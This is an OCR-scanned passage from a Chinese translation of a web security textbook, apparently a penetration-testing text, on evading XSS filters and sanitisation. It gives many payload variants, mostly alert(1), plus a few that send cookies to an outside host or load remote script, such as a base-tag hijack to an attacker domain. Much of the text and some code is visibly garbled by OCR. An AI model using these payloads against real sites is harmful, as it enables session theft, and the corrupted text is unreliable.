HTML 请 求 进行 模糊 处 理 以 避 开 常见 的 过 滤 的 方法 。 本 市 对 JavaScript 
和 VBScript 语 法 应 用 相同 的 原则 。 

则 在 阻止 XSS 攻 击 的 基于 签名 的 过 小 通常 采用 正则 表达 式 或 其 他 
技巧 来 确定 关键 的 HTML 组 件 ， 如 标签 括号 、 标 签名 称 、 属 性 名 称 和 
属性 值 。 例 如 ， 过 滤器 可 能 会 阻止 包含 使 用 已 知 可 用 于 引入 脚本 的 特 
殊 标 签 或 属性 名 称 的 HTML 的 输入 ， 或 试图 阻止 以 脚本 伪 协 议 开 头 的 
属性 值 。 通 过 以 一 种 或 多 种 浏览 大 接受 的 方式 在 HTML 中 的 关键 位 置 
插入 不 常见 的 字符 ， 可 以 避 开 其 中 的 许多 过 滤 。 

我 们 来 了 解 一 下 这 种 技巧 的 用 法 ， 以 下 面 这 段 简单 的 脚本 为 例 : 


<img onerror=alert(1) src=a> 


可 以 通过 各 种 方式 修改 这 段 脚 本 ， 并 使 它 至 少 可 在 一 个 浏览 大 中 
运行 。 下 面 我 们 将 分 别 介绍 这 些 方 法 。 实 际 上 ， 你 可 能 需要 在 一 次 攻 
击 中 结合 利用 其 中 的 几 种 技巧 ， 以 避 开 更 加 复杂 的 输入 过 滤 。 

V 标签 名 称 

从 起 始 标 签名 称 开始 ， 只 需 改 变 所 使 用 字符 的 大 小 写 ， 即 可 避 开 
最 简单 的 过 滤 : 


<iMg onerror=alert(1) src=a> 
E#— F, BY UEA ANULLAT: 


<[%00]img onerror=alert(1) src=a> 
<i[%00]mg onerror=alert(1) src=a> 


(在 以 上 示例 中 ，[%XX] 表 示 十 六 进 制 ASCII 代 码 XX 的 原 义 字 
符 。 在 向 应 用 程序 实施 攻击 时 ， 通 常会 使 用 字符 的 URL 编 码 形 式 。 在 
查看 应 用 程序 的 响应 时 ， 需 要 在 其 中 寻找 已 解码 的 原 义 字符 。) 


V 提示 NULL 字 节 技 巧 可 用 在 Internet Explorer 上 的 HTML 页 
面 的 任何 位 置 。 在 XSS 攻 击 中 灵活 使 用 NULL 字 广 通 常 可 以 快速 避 
开 不 探查 下 行为 的 基于 签名 的 过 小 。 


事实 证 明 ， 使 用 NULL 字 节 可 以 有 效 避 开 配 置 为 阻止 包含 已 知 
攻击 字符 串 的 请 求 的 Web 应 用 程序 防火 墙 (WAF) 。 为 了 提高 性 
能 ，WAF 通 党 以 本 地 代码 编写 ， 因 此 ，NULL 字 区 将 终止 在 其 中 出 
现 的 字符 串 。 这 样 ，WAF 束 无 法 发 现 NULL 字 贡 之 后 的 恶意 有 效 载 
i 〈 请 参阅 第 16 章 了 解 详细 信息 ) 。 


更 进一步 ， 如 采 你 对 上 面 示例 中 的 标签 名 称 稍 做 修改 ， 整 可 以 使 
用 任意 标签 名 称 引 入 事件 处 理 夯 ， 从 而 避 开 仅仅 阻止 特定 标签 名 称 的 
wie: 


<x onclick=alert{1) src=a>Click here</x> 


有 时 ， 可 以 引入 不 同名 称 的 新 标签， 但 却 找 不 到 使 用 这 些 标签 直 
接 执 行 代码 的 方法 。 在 这 些 情况 下 ， 可 以 使 用 一 种 称 为 “基本 标签 动 
持 ” 的 技巧 来 实施 攻击 。<base> 标 等 用 于 指定 一 个 URL， 浏 贤 器 应 使 用 
该 URL 解 析 随 后 在 页 面 中 出 现 的 任何 相对 URL。 如 果 可 以 引入 一 个 新 
的 <base>， 并 且 页 面 执行 反射 点 后 的 任何 使 用 相对 URL 的 <script>， 则 
你 丈 可 以 指定 一 个 指 癌 受 你 控制 的 服务 夯 的 基本 URL。 当 浏览 右 加 载 
在 HIML 页 面 的 剩余 部 分 指定 的 脚本 时 ， 这 些 脚本 将 从 指定 的 服务 天 
加 载 ， 但 仍然 能 够 在 调用 它们 的 页 面 中 执行 。 例 如 : 


<base href="http://mdattacker.net/badscripts/"> 


<script src="goodscript.js"></script> 


根据 规范 ，<base> 标 签 应 出 现在 HIML 页面 的 <head> 部 分 。 但 
,一 些 浏览 器 ， 如 Firefox， 人 允许 <base> 标 签 出 现在 页 面 的 任何 位 
这 显著 扩大 了 这 种 攻击 的 范围 。 

V 标签 名 称 后 的 空格 

一 些 字符 可 用 于 奉 代 标签 名 称 与 第 一 个 属性 名 称 之 间 的 空格 : 


<img/onerror=alert(1) src=a> 


pi 


<img [(%09]onerror=alert({1) src=a> 
<img[%0d] onerror=alert(1) src=a> 
<img [%0a]onerror=alert(1) src=a> 
<img/"“onerror=alert(1}) src=a> 
<img/'onerror=alert(1) src=a> 
<img/anyjunk/onerror=alert(1) src=a> 


需要 注意 的 是 ， 即 使 在 实施 攻击 时 不 需要 任何 标签 属性 ， 仍 然 应 
始终 在 标签 名 称 后 面 添加 一 些 多 余 的 内 容 ， 因 为 这 样 做 可 以 避 开 一 些 
简单 的 过 滤 : 


<script/anyjunk>alert (1)</script> 


V 属性 名 称 

也 可 以 在 属性 名 称 中 使 用 上 述 NULL 字 节 技 巧 。 这 样 做 可 以 避 开 
许多 试图 通过 阻止 以 on 开头 的 属性 名 称 来 阻止 事件 过 滤 右 的 简单 过 
JE: 


<img o[%00]nerror=alert(1) src=a> 


V 属性 分 隔 符 

在 最 初 的 示例 中 ， 属 性 值 之 间 并 未 分 隔 开 来 ， 因 而 需要 在 属性 值 
后 面 插入 一 些 空格 ， 表 示 属 性 值 已 结束 ， 以 便于 添加 其 他 属性 。 属 性 
可 以 选择 使 用 双 引 号 或 单 引号 进行 分 阳 ， 或 在 IE 上 使 用 重 首 符 分 隔 : 


<img onerror="alert(1)"src=a> 
<img onerror='alert(1)'src=a> 
<img onerror= alert (1) src=a> 
前 面 的 示例 提供 了 另 一 种 方法 ， 可 用 于 避 开 一 些 检 查 以 on 开头 的 
属性 名 称 的 过 滤器 。 如 果 过 滤器 不 知道 重音 符 被 用 作 属 性 分 隔 符 ， 它 
会 将 下 面 的 示例 视 为 仅 包 含 一 个 属性 ， 其 名 称 不 再 为 事件 处 理 器 的 名 
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<img src= ‘a onerror=alert (1)> 


通过 使 用 引号 分 隔 的 属性 ， 并 在 标签 名 称 后 面 插入 异 第 了 字符， 下 
可 以 设计 出 不 需要 使 用 任何 空格 的 攻击 ， 从 而 避 开 一 些 简 单 的 过 渡 : 


<img/onerror="alert(1)"src=a> 


尝试 访问 


http://mdsec.net/search/69/ 
http://mdsec.net/search/72/ 
http://mdsec.net/search/75/ 


V 属性 值 
在 属性 值 中 ， 可 以 使 用 NULL 字 节 技 巧 。 还 可 以 使 用 HTML 编 码 的 
FFF, OE Bra: 


<img onerror=a[%00]lert(1) src=a> 


<img onerror=a&#x6c;ert(1) src=a> 
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此 ， 可 以 使 用 HTML 编 码 对 脚本 代码 进行 模糊 处 理 ， 从 而 避 开 任何 过 
滤 。 例 如 ， 以 下 攻击 避 开 了 许多 试图 阻止 JavaScript 伪 协议 处 理 絮 的 过 
lise 


<img onerror=a&#x06c;ert(1) src=a> 
<img onerror=a&#x006c;ert(1) src=a> 
<img onerror=a&#x0006c;ert(1) src=a> 
<img onerror=a&#108;ert(1) src=a> 
<img onerror=a&#0108;ert({1) src=a> 
<img onerror=a&#108ert(1) src=a> 
<img onerror=a&#0108ert(1) src=a> 


在 使 用 HTML 编 码 时 ， 值 得 注意 的 是 ， 浏 贤 郁 接受 规范 的 各 种 变 
体 ， 甚 至 可 能 忽略 过 滤 絮 “意识 到 ”的 HTML 编 码 问 题 。 可 以 使 用 十 进 
制 和 十 六 进 制 格式 ， 漆 加 多 余 的 前 导 零 ， 并 省 略 结尾 的 分 号 。 以 下 示 
例 至 少 可 以 用 在 一 种 浏览 器 中 : 


<iframe src=j&#x61; vasc&#x72ipt&#x3a;alerc&#x28; 1&#x29; > 


V 标签 括号 
有 些 时 候 ， 通 过 利用 奇怪 的 应 用 程序 或 浏览 器 行为 ， 甚 至 可 以 使 
HERRIE, H HIRE EAE HIA RARER 


— E Dy FRE EM HA RWA a UT A URL AES, Al 
此 ， 请 求 中 的 以 下 输入 


$253cimgs200nerror=alert (1) %20src=a%253e 


被 应 用 程序 服务 硕 进 行 URL 解 码 ， 然 后 将 以 下 输入 传递 给 应 用 程序 : 
$3cimg onerror=alert(1) src=a%3e 


其 中 并 不 包含 任何 标签 括号 ， 因 此 不 会 被 输入 过 滤 阻 止 。 但 古 ， 
应 用 程序 随后 会 执行 第 二 次 URL 人 解码 ， 因 此 输入 将 变 为 : 


<img onerror=alert(1) src=a> 


该 输入 会 回 显 给 用 户 ， 导 致 攻击 得 以 实施 。 

如 第 2 章 所 述 ， 如 果 应 用 程序 框架 基于 字形 和 发 音 的 相似 性 ， 将 不 
常见 的 Unicode 字 符 “ 转 换 ? 为 它们 最 接近 的 ASCI 字 符 ， 这 时 可 能 会 
现 与 上 述 示例 类 似 的 情况 。 例 如 ， 以 下 输入 使 用 Unicode 双 和 角 引 号 
(96u00AB 和 %u00BB) ， 而 不 是 标签 括号 : 


«img onerror=alert(1) src=a» 


应 用 程序 的 输入 过 滤 可 能 会 允许 该 输入 ， 因 为 其 中 并 不 包含 任何 
有 问题 的 HTML。 但 是 ， 如 果 应 用 程序 框架 在 输入 被 插入 到 啊 应 中 时 
将 引号 转换 为 标签 字符 ， 攻 击 将 取得 成 功 。 事 实证 明 ， 由 于 开发 者 的 
焉 名 ， 大 量 应 用 程序 都 易于 受到 这 种 攻击 。 

一 些 输入 过 滤 通 过 简单 地 匹配 起 始 和 结束 尖 括 号 ， 提 取 内 容 ， 并 
将 其 与 标签 名 称 黑 名 单 进行 比较 来 识别 HTML 标 签 。 在 这 种 情况 下 ， 
可 以 通过 使 用 多 余 的 括号 《如果 浏览 器 接受 ) 来 避 开 过 滤 : 


<<script>alert(1);//<</scrip 
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攻击 ， 从 而 避 开 应 用 程序 的 输入 过 滤 。 例 如 ， 以 下 HTML 使 用 了 


ECMAScript for XML(E4X)， 其 中 并 不 包含 有 效 的 起 始 脚本 标签 ， 但 
仍然 可 以 在 当前 版 本 的 Firefox 中 执行 包含 的 脚本 : 


<script<{alert(1)}/></script> 


YY ”提示 在 上 述 用 于 名 开 过 滤 的 各 种 技巧 中 ， 实 施 攻 击 的 
HTML 叶 然 存 在 缺陷 ， 但 仍 被 客 户 并 浏览 右 所 接受 。 由 于 有 大 量 相 
当 合法 的 网 站 包含 并 不 严格 遵循 标准 的 HTIML， 这 导致 浏览 郁 接 受 
各 种 各 样 存在 问题 的 HTML。 在 呈现 页 面 之 前 ， 这 些 浏览 器 会 在 后 


人 台 有 效 地 修复 相关 错误 。 通 常 ， 在 反常 情况 下 壬 试 调整 攻击 方式 

上 时， 查看 浏 贤 絮 基于 服务 器 的 具体 响应 构建 的 虚拟 HTML 会 有 所 帮 
助 。 在 Firefox 中 ， 可 以 使 用 WebDeveloper 工 具 ， 该 工具 提供 的 “查看 
生成 的 源 ”(View Generated Source) 功能 正好 可 用 于 完成 上 述 任 
Ro 


Fi 
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有 些 时 候 可 以 使 用 一 种 非常 强大 的 方法 ， 致 使 应 用 程序 接受 攻击 
BSCE far AEP ESS, MOTT EAE A PPE oR EA as 
了 字符 串 <script>alert(document.cookie)</script> 的 一 些 非 标准 编码 表示 
法 : 

UTF-7 


+ADw-script+AD4-alert (document .cookie) +ADw-/script+AD4- 


US-ASCII 


5 <. 
E { 1 ce 65 { { ws > E 1 
F 60 bE { -C.u.m.e.n.t 
00 6B 9 0 65 00 29 a I o Ik 2 
F OO 63 00 72 9 00 70 00 74 E S.C. r.i.p. t> 


这 些 编码 后 的 字符 串 可 避 开 许多 常见 的 反 XSS 过 滤 。 实 施 成 功 攻 
击 的 挑战 在 于 如 何 使 浏览 器 使 用 所 需 的 字符 集 来 解释 啊 应 。 如 有 果 你 控 
制 了 HTTP Content- Type 消息 头 或 其 对 应 的 HTML 元 标签 ， 就 可 以 使 用 
非 标准 字符 集 避 开 应 用 程序 的 过 滤 ， 使 浏览 器 按照 需要 的 方式 解释 有 
效 载 倚 。 一 些 应 用 程序 在 某 些 请 求 中 提交 charset 参 数 ， 人 允许 直接 设置 
在 应 用 程序 的 响应 中 使 用 的 字符 集 。 

如 有 果 应 用 程序 默认 使 用 多 字 市 字符 集 ， 如 Shift-JIS， 这 时 ， 可 以 
通过 提交 在 所 采用 的 字符 集中 具有 特殊 意义 的 字符 来 避 开 某 些 输 入 过 
滤 。 例 如 ， 假 设 应 用 程序 的 响应 中 返回 了 以 下 两 段 用 户 输入 : 


<img src="image.gif* alt="([inputli]" /> ... [input2] 


对 于 input1， 应 用 程序 会 阻止 包含 引号 的 输入 ， 以 防止 攻击 者 终 
止 引 用 的 属性 。 对 于 input2， 应 用 程序 会 阻止 包含 尖 括 号 的 输入 ， 以 
防止 攻击 者 使 用 任何 HTML 标 签 。 这 种 过 滤 似 乎 较为 可 靠 ,但 是 ， 攻 
击 者 可 以 通过 使 用 以 下 两 个 输入 来 实施 攻击 : 


inputi: [%f£0] 
input2: "onload=alert (1); 


在 Shift-JIS 字 符 集 中 ， 各 种 原始 字 节 值 (包括 0xf0) 用 于 表示 由 该 
字 节 及 随后 的 字 节 组 成 的 2 字 节 字符 。 因 此 ， 浏 览 器 在 处 理 input1 时 ， 
0xf0 字 节 后 面 的 引号 将 被 解释 为 一 个 2 字 节 字符 的 一 部 分 ， 而 不 是 属性 
值 的 分 隔 符 。HTML 解 析 器 将 继续 运行 ， 直 到 到 达 input2 提 供 的 引号 位 
置 (该 引号 终止 了 属性 ) ， 从 而 允许 攻击 者 提交 将 作为 其 他 标签 属性 
解释 的 事件 处 理 器 : 


<img src="image.gif" alt="? /> ... “onload=alert(1); 
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布 了 一 个 补丁 ， 阻 止 了 相关 攻击 。 但 是 ， 这 些 攻击 当前 仍然 能 够 在 某 


些 浏 贤 亏 上 成 功 实施 ， 它 们 主要 针对 是 其 他 一 些 较 少 使 用 的 多 字 币 字 
符 集 ， 包 括 Shift-JIS、EUC-JP 和 BIG5 ° 

@ 避 开 过 滤 : 脚本 代码 

某 些 情 况 下 ， 可 以 找到 办 法 来 操纵 反射 型 输入 ， 从 而 在 应 用 程序 
的 啊 应 中 播 入 脚本 。 但 是 ， 可 能 会 遇 到 各 种 其 他 障碍 ， 无 法 执行 实施 
有 效 攻击 所 需 的 代码 。 这 时 ， 遇 到 的 过 滤 通 常会 试图 阻止 你 使 用 某 些 
JavaScript 天 键 字 和 其 他 表达 式 。 它 们 还 可 能 阻止 有 用 的 字符 ， 如 引 
号 、 括 号 和 圆 点 。 

和 使 用 HTML 对 攻击 进行 模糊 处 理 一 样 ， 也 可 以 通过 使 用 各 种 技 
巧 来 修改 所 需 的 脚本 代码 ， 以 避 开 常见 的 输入 过 小。 

v 使 用 JavaScript 转 义 

JavaScript 允 许 各 种 字符 转 义 ， 可 以 通过 这 种 方式 避免 包含 原 义 格 
式 的 表达 式 。 

Unicode 转 义 可 用 于 表示 JavaScript 关 键 字 中 的 字符 ， 从 而 避 开 许 
多 类 型 的 过 滤 : 


<script>a\u006cert (1) ;</script> 
如 采 能 够 使 用 eval 命 令 (通过 利用 之 前 介绍 的 技巧 来 转 义 它 的 某 
些 字 符 ) ， 束 可 以 将 其 他 命令 以 字符 串 格 式 传送 给 eval 命 令 ， 从 而 执 
行 这 些 命令 。 这 样 ， 就 可 以 利用 各 种 字符 串 操纵 技巧 来 隐藏 执行 的 命 
Ss 
在 JavaScript 字 符 串 中 ， 可 以 使 用 Unicode 转 义 、 十 六 进 制 转 义 和 
八进制 转 义 : 
<script>evall(l'a\u006cert(1}')}) ;</script> 
<script>eval('a\x6cert(1)');</script> 
<script>eval('a\154ert(1)');</script> 


此 外 ， 字 符 串 中 的 多 余 转 义 字符 将 被 忽略 : 


<script>eval('a\l\ert\(1\)');</seript> 


V 动态 构建 字符 串 
可 以 使 用 其 他 技巧 来 动态 构建 在 攻击 中 使 用 的 字符 串 : 


上 面 的 示 网 可 在 eens. 可 以 通 ee 命 
令 ， 然 后 将 其 传递 给 eval 。 

vV {Reval AVE 
WATCH BL eval >, 可 以 通过 其 他 方法 以 字符 串 格 式 执 


ATATS : 
BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; “scriptkalert (do 
v BL 
如 采 圆 点 被 阻止 ， 可 以 使 用 以 下 方法 解 引 用 : 
<script>alert (document ['cookie'])</script> 


<script>with(document) alert (cookie) </script> 


V 组 合 多 种 技巧 

到 现在 为 止 ， 我 们 介绍 的 各 种 技巧 通常 都 可 以 组 合 使 用 ， 以 对 攻 
击 进 行 多 层 模糊 处 理 。 .在 HTML 标 签 属 性 中 使 用 JavaScript (通过 事件 
处 理 器 、 脚 本 伪 协 议 或 动态 求 值 的 样式 ) AY’ 情况 下 ， 可 以 将 这 些 技巧 
与 HIML 编 码 组 合 使 用 。 浏 览 器 会 对 标签 属性 值 进行 HTML 解 码 ， 然 
后 再 解释 其 中 包含 的 JavaScript。 在 下 面 的 示例 中 ， et 中 的 e 字 符 使 用 
Unicode 转 义 方 法 进行 了 转 义 ， 并 且 Unicode 转 义 中 使 用 的 反 斜 线 经 过 
了 HTML 编 码 : 


<img onerror=eval({'al&#x5c;u0065rt(1)') src=a> 


当然 ， 还 可 以 对 onerror 属 性 值 中 的 任何 其 他 字符 进行 HTML 编 
码 ， 以 进一步 隐藏 攻击 : 


cimg onerror=&#x65;&#x76; fAX61 ; &łx6c; & #28; KAT aAl&#xSc;vI0GSrcksx? 


4X29; &ËX27;&#x29; Src=a> 


使 用 这 种 技巧 可 以 避 开 许多 针对 JavaSaript 代 码 的 过 滤 因为 可 以 
避免 使 用 任何 JavaScript 天 键 字 或 其 他 语法 ， 如 引号 、 句 号 和 括号 。 

v 使 用 VBScript 

常见 的 XSS 攻 击 通 常 主要 通过 JavaScript 来 实施 ， 但 是 ， 在 Internet 
Explorer 上 ， 还 可 以 使 用 VBScript 语 言 。 该 语言 使 用 不 同 的 语法 和 其 他 


属性 ， 攻 击 者 可 以 对 其 加 以 利用 ， 以 避 开 许多 仅 针 对 JavaScript 的 输入 
过 滤 。 
可 以 通过 各 种 方式 插入 VBScript 代 码 ， 如 下 所 示 : 


<script language=vbs>MsgBox 1</script> 
<img onerror="vbs:MsgBox 1" src=a> 
<img onerror=MsgBox+1l language=vbs src=a> 


无 论 是 哪 一 种 情况 ， 都 可 以 使 用 vbscript (而 不 是 vbs) 来 指定 语 
言 。 请 注意 ， 最 后 一 个 示例 使 用 了 MsgBox+1， 以 避免 使 用 空 日 符 ， 
而 也 不 需要 在 属性 值 周 围 加 上 引号 。 这 样 做 之 所 以 可 行 ， 是 因为 +1 有 
效 地 给 “空白 ”加 上 了 数字 1， 因 此 表达 式 的 求 值 结果 为 1 随后， 这 一 
BERANE IE ZA MsgBox NAY © 

值得 注意 的 是 ， 如 前 面 的 示例 所 示 ， 在 VBScript 中 ， 一 些 函 数 无 
须 使 用 括号 即 可 调用 。 如 果 过 滤 机 制 认 为 必须 使 用 括号 才能 访问 函 
数 ， 就 可 以 通过 使 用 VBScript 来 避 开 这 些 过 滤 。 

此 外 ， 与 JavaScript 不 同 ，VBScript 语 言 不 区 分 大 小 写 ， 因 此 ， 可 
以 在 所 有 关键 字 和 函数 名 称 中 使 用 大 写 和 小 写字 符 。 如 果 你 所 攻击 的 
应 用 程序 函数 会 修改 输入 的 大 小 写 ， 如 将 其 转换 为 大 写 ， 这 时 
VBScript 殉 特别 有 用 。 虽 然 应 用 程序 将 输入 转换 为 大 写 的 做 法 主要 是 
出 于 功能 而 不 是 安全 考虑 ， 但 这 样 做 却 可 以 挫败 使 用 JavaScript 代 码 的 
XSS 攻 击 ， 因 为 转换 为 大 写 后 ， 代 码 将 无 法 执行 。 与 之 相反 ， 使 用 
VBScript 代 码 的 攻击 仍然 有 效 : 


<SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT> 
<IMG ONERROR="VBS:MSGBOX 1" SRC=A> 


V 28 SJavaScript# VBScript 
为 进一步 增加 攻击 的 复杂 程度 ， 并 避 开 某 些 过 滤 ， 可 以 从 
JavaScript 中 调用 VBScript， 或 从 VBScript 中 调用 JavaScript: 


<script>execScript ("MsgBox 1","vbscript");</script> 
<script language=vbs>execScript ("alert (1)")</seript> 
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<script>execScript ('execScript 


el Mv “vescript") +</f/script> 


如 上 所 述 ，VBScript 不 区 分 大 小 写 ， 即 使 输入 被 转换 为 大 写 ， 你 
的 代码 仍然 可 以 执行 。 在 这 些 情况 下 ， 如 果 你 确实 希望 调用 JavaScript 
函数 ， 可 以 使 用 VBScript 中 的 字符 串 操 纵 函 数 用 所 需 的 大 /小 写 构建 一 
个 命令 ， 并 使 用 JavaScript 执 行 该 命令 : 
<SCRIPT LANGUAGE-VBS>=XECSCRIPT(LCASE(*ALERT(1)")} </SCRIPT> 
<IMG ONERROR="VBS:EXECSCRIPT LCASE('ALERT(1)')" SRC=A> 


V 使 用 经 过 编码 的 脚本 
在 Internet Explorer 上 ， 可 以 使 用 Microsoft 的 定制 脚本 编码 算法 来 
隐藏 脚本 的 内 容 ， 从 而 避 开 某 些 输入 过 渡 : 


<img language="JScript.Bncode" onerror #G~°“CAAAAA==C*%+.D  S#mglAAA=="8#-@* 


这 种 编码 最 初时 在 用 于 防止 用 户 通 过 查看 HTML 页 面 的 源 代码 来 
轻松 访问 客户 端 脚本 。 此 后 ， 该 算法 被 人 们 破解 ， 而 且 ， 可 以 通过 各 
种 工具 和 网 站 来 解码 经 过 编码 的 脚本 。 通 过 Microsoft 的 旧版 Windows 
中 的 命令 行 实 用 工具 srcenc， 你 可 以 对 目 己 的 脚本 进行 编码 ， 以 用 于 
实施 攻击 。 

5. 避 开 净化 

当 演 试 利 用 洪 在 的 XSS 漏 洞 时 ， 避 开 净 化 可 能 是 所 有 障碍 中 最 为 
常见 的 一 种 。 这 时 ， 应 用 程序 对 攻击 字符 串 执 行 某 种 净化 或 编码 ， 使 
其 变 得 无 害 ， 防 止 它 执 行 JavaScript 。 

对 传送 攻击 所 需 的 某 些 关键 字符 进行 HTML 编 码 (因此 < 变 成 
&lt; ，> 变 成 &9t; ) 是 应 用 程序 实行 数据 净化 最 常见 的 做 法 。 其 他 
上 试图 清除 输入 

J 恶意 内 容 。 

如 果 遇 到 这 种 防御 ， 首 先 应 查 明 应 用 程序 净化 哪些 字符 与 表达 
式 ， 以 及 是 否 仍 然 可 通过 剩 下 的 字符 实施 攻击 。 例 如 ， 如 果 和 输入 的 数 
据 被 直接 揪 入 到 现 有 的 一 段 脚 本 中 ， 那 么 可 能 不 需要 使 用 任何 HIML 
标签 字符 。 或 者 ， 如 果 应 用 程序 从 输入 中 删除 <script> 标 签 ， 则 可 以 通 
过 适当 的 事件 处 理 程序 使 用 其 他 标签 。 这 时 ， 测 试 员 应 考虑 采用 之 前 
介绍 的 用 于 避 开 基于 签名 的 过 滤 的 各 种 技巧 ， 包 括 多 层 编码 、 空 字 
节 、 非 标准 语法 以 及 经 过 模糊 处 理 的 脚本 代码 。 通 过 以 上 述 各 种 方式 


修改 输入 ， 束 可 以 设计 出 不 包含 任何 被 过 滤 净 化 的 字符 或 表达 式 的 攻 
击 ， 因 而 能 够 成 功 避 开 过 滤 。 

如 条 只 有 使 用 已 被 净化 的 输入 才能 实施 攻击 ， 这 时 吏 需 要 测试 净 
化 过 滤 的 效率 ， 以 确定 是 否 可 找到 任何 避 开 过 滤 的 方法 。 

如 第 2 章 所 述 ， 疤 化 过 着 中 往往 存在 一 些 错误 。 一 些 字 符 串 操作 
API 包 含 仅 替 换 第 一 个 匹配 的 表达 式 实例 的 方法 ， 有 时 ， 这 些 方法 易 
于 与 那些 寿 换 所 有 实例 的 方法 相 混 消 。 因 此 ， 如 果 输 入 中 的 <script> 被 
删除 ， 则 应 竹 试 以 下 输入 ， 以 查看 是 否 所 有 实例 均 被 删除 : 


<script><script>alert (1)</script> 
在 这 种 情况 下 ， 还 应 检查 过 滤 是 否 以 递归 方式 执行 净化 : 
<scr<script>ipt>alert (1)</script> 
此 外 ， 如 宁 过 滤 对 输入 执行 多 个 净化 步骤 ， 则 应 检查 是 否 可 以 对 
这 些 步骤 之 间 的 顺序 或 相互 关系 加 以 利用 。 例 如 ， 如 有 果 过 滤 递 归 删 除 
<script>， 然 后 递归 有 删除 <object>， 以 下 攻击 或 许 能 够 取得 成 功 : 


<scr<object>ipt>alert (1)</script> 


当 在 现 有 的 一 段 脚本 中 注入 一 个 引用 字符 串 时 ， 应 用 程序 经 党 在 
注入 的 引号 字符 前 插入 反 斜 线 字 符 。 应 用 程序 这 样 做 是 为 了 对 引号 进 
行 转 义 ， 阻 止 攻击 者 终止 字符 串 或 注入 任意 脚本 。 在 这 种 情况 下 ， 应 
该 始终 核实 反 斜 线 字 符 本 刁 是 否 被 转 义 。 如 果 其 未 被 转 义 ， 那 么 这 种 
过 滤 束 可 以 轻易 避 开 。 例 如 ， 如 果 能 够 控制 下 面 的 foo 值 : 


var a = tfoot; 
那么 就 可 以 注入 
foo\': alert(1);// 


这 段 代 码 生成 如 下 啊 应 ， 其 中 含有 受 控制 的 脚本 。 注 意 ， 必 须 使 
用 JavaScript 注 释 符 号 /将 剩 下 的 脚本 作为 注释 处 理 ， 防 止 应 用 程序 目 
己 的 字符 串 分 隅 符 造 成 语法 错误 。 


TEN 
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攻击 者 可 以 使 用 以 下 攻击 字符 串 : 


</script><script>alert (1)</script> 


这 样 做 可 废弃 应 用 程序 中 原来 的 脚本 ， 并 在 其 后 注入 一 段 狐 的 脚 
本 。 攻 击 之 所 以 能 够 成 功 ， 是 因为 浏览 絮 在 解析 植 入 的 JavaScript 之 
前 ， 优 先 解 析 HTML 标 签 。 


<script>var a = '</script><script>alert (1)</script> 


此 时 ， 虽 然 原来 的 脚本 中 包含 一 个 错误 ， 但 这 无 天 紧要 ， 因 为 浏 
览 需 会 跳 过 这 个 错误 ， 继 续 执 行 注入 的 脚本 。 


尝试 访问 


http://mdsec.net/search/48/ 
http://mdsec.net/search/52/ 


Vo ”提示 在 前 面 的 两 个 攻击 中 ， 即 使 攻击 者 能 够 控制 一 段 脚 
本 ， 但 由 于 应 用 程序 对 单 引 号 或 双 引 号 进行 了 转 义 ， 他 也 无 法 使 用 
它们 ， 但 可 以 使 用 string.fromCharCode 技 巧 ， 不 用 分 隔 符 创 建 字符 
$ o 


如 果 注 入 的 脚本 位 于 事件 处 理 程序 之 内 ， 而 非 完整 的 脚本 块 ， 则 
可 以 对 引号 进行 HTIML 编 码 ， 以 避 开 应 用 程序 的 将 化， 并 使 受 控制 的 
字符 串 免 于 被 过 滤 。 例 如 ， 如 果 可 以 控制 以 下 输入 中 的 foo 值 : 


< href="*" onclick="var. a= 'foo'; 
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foo&apos;; alert(1);// 


这 导致 以 下 响应 ， 由 于 一 些 浏览 器 在 将 事件 处 理 程序 作为 
JavaScript 执 行 之 前 会 执行 HTML 解 码 ， 因 此 该 攻击 取得 成 功 : 


<a href="#" onclick="var a = 'fookapos;; alert(1);//"; . 


应 对 用 户 输入 进行 HTML 编码 来 防范 Xs 攻击 ， 对 于 这 一 常规 建 
议 ， 应 注意 以 下 事实 : 在 作为 JavaSrcipt 执 行 之 前 ， 事 件 处 理 絮 会 被 
HTML 解 码 。 在 这 种 情况 下 ， 进 行 HTML 编 码 并 不 一 定 能 够 阻止 攻 
击 。 攻 击 者 甚至 可 以 利用 这 种 方法 避 开 其 他 防御 机 制 。 

6. 突破 长 度 限 制 


当 应 用 程序 把 输入 截 短 为 一 个 固定 的 最 大 长 度 时 ， 有 三 种 建立 攻 
击 字 符 串 的 方法 。 

第 一 种 相当 明显 的 方法 是 尝试 使 用 最 短 可 能 长 度 的 
JavaScriptAPI， 删 除 那些 通常 包含 在 内 但 并 不 完全 必要 的 字符 ， 缩 短 
攻击 有 效 载 傈 。 例 如 ， 如 果 注 入 现 有 的 一 段 代 码 ， 下 面 的 28 字 和 命令 
将 把 用 户 的 cookie 传 送 至 主机 名 为 a: WARS HE ° 


open("//a/"+document.cookie) 


另外 ， 如 果 直 接 注 入 HTML， 那 么 下 面 这 个 30 字 市 的 标签 将 从 主 
机 名 为 a 的 服务 器 加 载 并 执行 一 段 脚 本 。 


<script src=http://a></script> 


在 因特网 上 ， 这 些 示例 明显 需要 进行 扩展 ， 在 其 中 包含 一 个 有 效 
的 域名 或 I1P 地 址 。 但 是 ， 内 部 企业 网 络 实际 有 可 能 使 用 一 台 WINS 名 为 
a 的 机 器 作为 接收 服务 器 。 


W 提示 可 以 使 用 Dean Edward 的 JavaScript packer 工 具 


( 见 http://dean.edwards.name/packer/) 删除 不 必要 的 空白 符 ， 尽 可 
能 地 缩短 某 一 段 脚本 。 这 个 工具 还 可 将 脚本 转换 成 单独 一 行 ， 方 便 
插入 到 一 个 请 求 参 数 中 。 


第 二 种 更 加 强大 的 突破 长 度 限制 的 技巧 是 将 一 个 攻击 有 效 载 丛 分 
布 到 几 个 不 同 的 位 置 ， 用 户 控制 的 输入 在 这 里 插入 到 同一 个 返回 页 面 
中 。 以 下 面 的 URL 为 例 : 

https://wahh-app.com/account.php? 
page_id=244&seed=129402931&mode=normal 

它 将 返回 一 个 包含 以 下 内 容 的 页 面 : 


<input type="hidden" name="page_id" value="244"> 


<input type="hidden" name="seed" value="129402931"> 
<input type="hidden" name="mode" value="normal"> 


假设 应 用 程序 对 每 个 字段 实施 了 长 度 限 制 ， 以 阻止 在 其 中 插入 有 
效 的 攻击 字符 哩 。 但 是 攻击 者 仍然 可 以 使 用 以 下 URL 将 一 段 脚本 分 布 
到 他 所 控制 的 三 个 位 置 ， 从 而 传送 一 个 有 效 的 攻击 字符 串 : 


https: //myapp.com/account.php?page_id=" script>/*&seed=*/alert {document 


okie); /*&meder*/</ script> 


这 个 URL 的 参数 值 植 入 到 页 面 中 后 ， 生 成 如 下 脚本 : 


